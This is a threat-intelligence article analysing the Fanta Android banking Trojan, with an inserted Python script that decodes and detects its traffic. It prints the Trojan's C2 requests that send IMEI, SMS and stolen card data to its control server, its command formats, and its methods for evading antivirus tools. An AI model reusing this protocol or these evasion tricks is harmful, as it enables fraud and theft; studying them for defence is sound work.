Leisya, Fanta: new tactics of an old Android Trojan


One day you want to sell something on Avito and, having posted a detailed description of your item (for example, a RAM module), you receive this message:

[screenshot]
If you open the link, you will see a harmless-looking page informing you, the happy and successful seller, that the purchase has been made:

[screenshot]
After you press the "Continue" button, an APK file with an icon and a trust-inspiring name is downloaded to your Android device. You installed the application, which for some reason asked for AccessibilityService rights; then a couple of windows appeared and quickly disappeared and... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter them, something terrible happens: for reasons still unclear to you, money starts disappearing from your account. You try to fix the problem, but your phone resists: it presses the "Back" and "Home" keys by itself, does not turn off and does not let you take any protective measures. As a result, you are left without money, your item has not been sold, you are confused and wonder: what happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let's explain.

Authors: Andrey Polovinkin, junior malware analyst; Ivan Pisarev, malware analyst.

Some statistics

The Flexnet family of Android Trojans first became known back in 2015. Over its long period of activity the family has grown into several subspecies: Fanta, Limebot, Lipton and others. The Trojan and the infrastructure around it do not stand still: new, effective distribution schemes are being developed (in our case, high-quality phishing pages aimed at a specific user-seller), and the Trojan's developers follow the fashion in virus writing, adding new functionality that makes stealing money from infected devices more effective and helps bypass protection mechanisms.

The campaign described in this article targets users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years now and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential damage exceeds 35 million rubles, and that is for the Russian campaign alone. In 2015 various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means the damage statistics worldwide are even more impressive. Not a bad showing for such an old-timer, is it?


From sale to fraud

As can be seen from the screenshot of the phishing page shown earlier, imitating the Avito classified-ads service, the page was prepared for a specific victim. Apparently the attackers use one of the Avito parsers, which extracts the seller's phone number and name together with the item description. After generating the page and preparing the APK file, the victim is sent an SMS with their name and a link to a phishing page containing the description of their item and the amount received from the "sale". By pressing the button, the user receives the malicious APK file: Fanta.

Analysis of the shcet491[.]ru domain showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the provider WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to a shared hosting server. The registrar used is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links of the following format were available from almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also fits this template. Historical data showed that one domain corresponds to several different links matching the pattern above, which indicates that a single domain was used to distribute the Trojan to multiple victims.

Let's jump ahead a little: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and from 2019-04-29 APK applications began interacting with it. According to VirusTotal data, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and belonging to the provider WorldStream. The registrar used is namecheap. The domains bad-racoon[.]club (from 2018-09-25) and bad-racoon[.]live (from 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

In general, the attack proceeds as follows:

[diagram]

What's under the hood of Fanta?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of applications (including banking ones). However, the functional arsenal of this family has grown: Fanta began using AccessibilityService for various purposes: reading the contents of notifications from other applications, preventing detection and termination of the Trojan on the infected device, and so on. Fanta works on all Android versions from 4.4 upwards. In this article we take a close look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:

  • Android_x86
  • Virtualbox
  • Nexus 5X (bullhead)
  • Nexus 5 (razor)

This check is performed in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialized to default values (the format used to store configuration data and its meaning are discussed later), and the newly infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country in which the user is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as its CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address, hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address can serve two purposes: spreading load evenly between several servers (with a large number of infected devices, the load on an unoptimized web server can be high), and switching to an alternative server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

Once the device has been registered successfully, Fanta shows the user the following message:

[screenshot]
Important note: the service called System Security is the name of the Trojan's service, and after the OK button is pressed a window opens with the Accessibility settings of the infected device, where the user is expected to grant accessibility rights to the malicious service:

[screenshot]
As soon as the user enables the AccessibilityService, Fanta gains access to the contents of application windows and to the actions performed in them:

[screenshot]
Immediately after receiving accessibility rights, the Trojan requests device administrator rights and the right to read notifications:

[screenshot]
Using AccessibilityService, the application emulates key presses and thereby grants itself all the rights it needs.

Fanta creates several database instances (described later) for storing configuration data as well as the information it collects about the infected device during operation. To send the collected information, the Trojan creates a recurring task that uploads fields from the database and receives a command from the control server. The CnC polling interval depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive a command, Fanta sends a GetTask request to the management server. In response, the CnC can send one of the following commands:

Command   Description
0         Send an SMS message
1         Make a call or execute a USSD command
2         Update the interval parameter
3         Update the intercept parameter
6         Update the smsManager parameter
9         Start collecting SMS messages
11        Reset the phone to factory settings
12        Enable/disable logging of dialog box creation

Fanta also collects notifications from 70 banking apps, fast payment systems and e-wallets and stores them in the database.

Storing configuration parameters

To store configuration parameters, Fanta uses the standard approach for the Android platform: Preferences files. The settings are saved to a file named settings. The stored parameters are described in the table below.

Name         Default value                   Possible values   Description
id           0                               Integer           Bot ID
server       hXXp://onuseseddohap[.]club/    URL               Control server address
pwd          -                               String            Server password
interval     20                              Integer           Time interval. Indicates how long the following tasks are postponed:

  • sending a request about the status of a sent SMS message
  • receiving a new command from the management server

intercept    all                             all/telNumber     If the field equals the string all or telNumber, a received SMS message is intercepted by the app and not shown to the user
smsManager   0                               0/1               Enable/disable the application as the default SMS receiver
readDialog   false                           True/False        Enable/disable logging of AccessibilityEvent events

Fanta also uses the file smsManager:

Name         Default value   Possible values   Description
pckg         -               String            Name of the SMS manager in use

Interaction with databases

During its operation the Trojan uses two databases. The database named a stores the various information collected from the phone. The second database is called fanta.db and stores the settings that govern the creation of the phishing windows used to collect bank card data.

The Trojan uses database a to store collected information and to log its own actions. The data is kept in the logs table, created with the following SQL statement:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. A record of the infected device starting up, with the message "Phone turned on!"

2. Notifications from applications. The message is built from the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Other <%App Name%>

The message is written in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog box, in the format:

(<%Package name%>)<%Package information%>

Example of the logs table:

[screenshot]
One of Fanta's functions is collecting bank card data. The data is collected through phishing windows created when banking applications are opened. The Trojan creates each phishing window only once. Whether a window has already been shown to the user is recorded in the settings table of the fanta.db database, created with the following SQL statement:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialized to 1 by default (create the phishing window). After the user has entered their data, the value is set to 0. Meaning of the settings table fields:

  • can_login: responsible for showing the form when a banking app is opened
  • first_bank: not used
  • can_avito: responsible for showing the form when the Avito application is opened
  • can_ali: responsible for showing the form when the Aliexpress application is opened
  • can_another: responsible for showing the form when any application from the following list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card: responsible for showing the form when Google Play is opened

Interaction with the management server

Network interaction with the management server takes place over HTTP. For networking, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. The server may send cookies in its responses. Fanta makes the following requests to the server:

  • Registration of the bot with the control server happens once, on first launch. The following data about the infected device is sent to the server:
    · Cookie: cookies received from the server (the default value is an empty string)
    · mode: the string constant register_bot
    · prefix: the integer constant 2
    · version_sdk: formed according to the template <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei: IMEI of the infected device
    · country: code of the country in which the user is registered, in ISO format
    · number: phone number
    · operator: operator name

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server must return a JSON object containing the following parameters:
    · bot_id: ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd: password for the server.
    · server: control server address. Optional parameter. If it is not specified, the address saved in the application is used.

    Example JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request for a command from the server. The following data is sent to the server:
    · Cookie: cookies received from the server
    · bid: id of the infected device received in response to the register_bot request
    · pwd: server password
    · divice_admin: indicates whether device administrator rights have been obtained. If they have, the field equals 1, otherwise 0
    · Accessibility: AccessibilityService status. If the service is running, the value is 1, otherwise 0
    · SMSManager: indicates whether the Trojan is enabled as the default application for receiving SMS
    · screen: indicates the state of the screen. The value is 1 if the screen is on, otherwise 0

    Example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server returns a JSON object with different parameters:

    · Command Send an SMS message: the parameters contain the phone number, the text of the SMS message and the ID of the message being sent. The identifier is used when sending a message of type setSmsStatus to the server.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Command Make a call or execute a USSD command: the phone number or the command is passed in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the interval parameter.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Command Change the SmsManager field.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Command Collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Command Reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Command Change the ReadDialog parameter.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message of type setSmsStatus. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database contents. One row is transmitted per request. The following data is sent to the server:
    · Cookie: cookies received from the server
    · mode: the string constant setSaveInboxSms
    · bid: id of the infected device received in response to the register_bot request
    · text: text of the current database record (field d of the logs table in database a)
    · number: number of the current record (field p of the logs table in database a)
    · sms_mode: integer value (field m of the logs table in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the upload to the server succeeds, the row is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
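To make the request and response formats above usable for detection and triage, here is an added Python example (not code from the article, from Group-IB or from the Trojan) that decodes a captured controller.php POST body and the server's JSON task list into the command names of the GetTask table, and lists which protocol features of one request match the article's description. The sample request body, headers and JSON reply are constructed for the example; the function names and the indicator list are my own.

```python
import json
from urllib.parse import parse_qs

# Command numbers from the GetTask table in the article.
COMMANDS = {
    0: "send_sms",
    1: "call_or_ussd",
    2: "set_interval",
    3: "set_intercept",
    6: "set_sms_manager",
    9: "collect_sms",
    11: "factory_reset",
    12: "set_read_dialog",
}

# Request types (the "mode" form field) described in the article.
KNOWN_MODES = {"register_bot", "getTask", "setSmsStatus", "setSaveInboxSms"}

# Constructed sample traffic (not a real capture): a getTask request and a
# reply carrying two known tasks and one unknown mode.
SAMPLE_REQUEST_BODY = (
    "mode=getTask&bid=42&pwd=s3cret&divice_admin=1"
    "&Accessibility=1&SMSManager=0&screen=1"
)
SAMPLE_HEADERS = {
    "Host": "onuseseddohap.club",
    "User-Agent": "okhttp/3.6.0",
    "Content-Type": "application/x-www-form-urlencoded",
}
SAMPLE_RESPONSE = json.dumps({
    "response": [
        {"mode": 0, "sms_number": "+79001234567", "sms_text": "test", "sms_id": 7},
        {"mode": 2, "interval": 30},
        {"mode": 99},
    ],
    "status": "ok",
})


def parse_request_body(body: str) -> dict:
    """Decode a form-encoded POST body into {field: value} (first value only)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def decode_tasks(json_text: str) -> list:
    """Map every object in the 'response' array to (command_name, params).

    Unknown mode numbers are reported rather than dropped, so a command the
    operators add later still shows up in triage output.
    """
    obj = json.loads(json_text)
    tasks = []
    for task in obj.get("response", []):
        mode = task.get("mode")
        name = COMMANDS.get(mode, "unknown_mode_%s" % mode)
        params = {k: v for k, v in task.items() if k != "mode"}
        tasks.append((name, params))
    return tasks


def fanta_indicators(path: str, headers: dict, body: str) -> list:
    """Return the protocol features of one HTTP request that match the article.

    Each feature is weak alone (okhttp/3.6.0 is a common User-Agent, and the
    C2 host is configurable); a rule should require a known 'mode' value
    together with at least one other feature.
    """
    hits = []
    fields = parse_request_body(body)
    if fields.get("mode") in KNOWN_MODES:
        hits.append("mode=" + fields["mode"])
    if path.endswith("/controller.php"):
        hits.append("path=/controller.php")
    if headers.get("Host", "").lower() == "onuseseddohap.club":
        hits.append("host=onuseseddohap.club")
    if headers.get("User-Agent", "") == "okhttp/3.6.0":
        hits.append("ua=okhttp/3.6.0")
    # The misspelled field name from the article's sample request is a
    # stronger indicator than the generic ones above.
    if "divice_admin" in fields:
        hits.append("field=divice_admin")
    return hits


if __name__ == "__main__":
    print(fanta_indicators("/controller.php", SAMPLE_HEADERS, SAMPLE_REQUEST_BODY))
    for name, params in decode_tasks(SAMPLE_RESPONSE):
        print(name, params)
```

Because the server address is itself a register_bot response field, a rule keyed only on the onuseseddohap.club host misses bots that have been redirected to a second CnC; the form-field names and the controller.php path survive such a move, which is why the indicator function reports them separately.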

Interaction with AccessibilityService

AccessibilityService was created to make Android devices easier to use for people with disabilities. In most cases, interacting with an application requires physical interaction. AccessibilityService allows this to be done programmatically. Fanta uses the service to create fake windows in banking applications and to prevent the user from opening system settings and certain applications.

Using AccessibilityService functionality, the Trojan monitors changes to the elements on the infected device's screen. As described earlier, the Fanta settings contain a parameter, readDialog, that controls logging of dialog box operations. If this parameter is set, the name and description of the package that triggered the event are added to the database. The Trojan performs the following actions when events are triggered:

  • Emulates pressing the Back and Home keys in the following cases:
    · when the user wants to reboot the device
    · when the user wants to delete the "Avito" application or change its access rights
    · when the "Avito" application is mentioned on the page
    · when the Google Play Protect application is opened
    · when pages with AccessibilityService settings are opened
    · when the System Security dialog box appears
    · when a page with the "Draw over other apps" settings is opened
    · when the "Applications", "Backup and reset", "Data reset", "Reset settings", "Developer panel", "Special. features", "Special features" or "Special rights" page is opened
    · when the event was generated by one of the applications from the list below.

    List of applications

    • Android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache and Garbage Cleaner
    • Parental control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock and Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • Mobile Security MegaFon
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus free 2019 - Protection for Android
    • Android antivirus
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: antivirus, VPN, anti-theft
    • Antivirus for Android

  • If permission is requested when sending an SMS message to a short number, Fanta emulates ticking the Remember choice checkbox and pressing the Send button.
  • When an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
  • Prevents new administrators from being added.
  • If the dr.web antivirus application detects a threat, Fanta emulates pressing the ignore button.
  • The Trojan emulates pressing the Back and Home buttons if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card data when an application from a list of about thirty different Internet services is launched. Among them: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto and others.

    Phishing forms

    Fanta analyzes which applications are running on the infected device. If an application of interest is opened, the Trojan shows a phishing window on top of all others: a form for entering bank card data. The user is asked to enter the following data:

    • Card number
    • Card expiry date
    • CVV
    • Cardholder name (not for all banks)

    Different phishing windows are shown depending on the running application. Below are examples of some of them:

    Aliexpress:

    [screenshot]
    Avito:

    [screenshot]
    For other applications, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    [screenshot]

    How it really happened

    Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. So the real version, without the director's cut, differs from the one told above: the person received an interesting SMS and then handed it over to the Group-IB Threat Hunting Intelligence team. The result of that attack is this article. A happy ending, isn't it? However, not every story ends so well, and to keep yours from turning into a director's cut with money lost, in most cases it is enough to follow the long-established rules:

    • do not install applications on an Android device from any source other than Google Play
    • when installing an application, pay close attention to the rights it requests
    • pay attention to the extensions of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious resources and do not download files from them
    • do not follow links received in SMS messages.

Source: www.habr.com
